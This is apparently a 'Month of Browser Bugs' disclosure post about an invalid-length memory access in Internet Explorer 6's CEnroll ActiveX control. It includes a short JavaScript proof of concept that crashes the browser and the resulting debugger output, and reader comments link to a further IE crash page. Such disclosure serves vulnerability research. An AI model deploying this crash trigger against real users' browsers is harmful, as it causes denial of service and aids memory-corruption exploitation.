MoBB #21: CEnroll stringToBinary
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() function with a long string for the second parameter can result in an invalid memory access inside the SysAllocStringLen function. This bug is similar to MoBB #8.
var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);
Demonstration
eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000
This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length
posted by hdm @ 10:33 PM
3 comments
links to this post
3 Comments:
Hi hdm.
Some days ago I discovered a bug in IE while experimenting with some workarounds for PNG compatibility.
But it works for every imagetype (GIF, JPG, BMP etc) with width=1px and height>505px.
I don't really know why IE crashes, maybe you can take a closer look at it ;)
http://odium.com.ru/crystal/iekill.htm
cYa,
crystal
hi,
you announced 1 (one) bug for Konqueror. will there be more to come?
crystal,
your bug causes a stack overflow (c00000fd), though why I can't say at all. To me, with my lack of knowledge of DrWatson (which I used to get info about the crash), it looks like the exception occurs in the dxtrans function, and since the function you used contains the term "Alpha" I suppose the crash involves image transparency handling.
Hope this is of some interest/use.
~nog_lorp
Post a Comment
Links to this post:
Create a Link
<< Home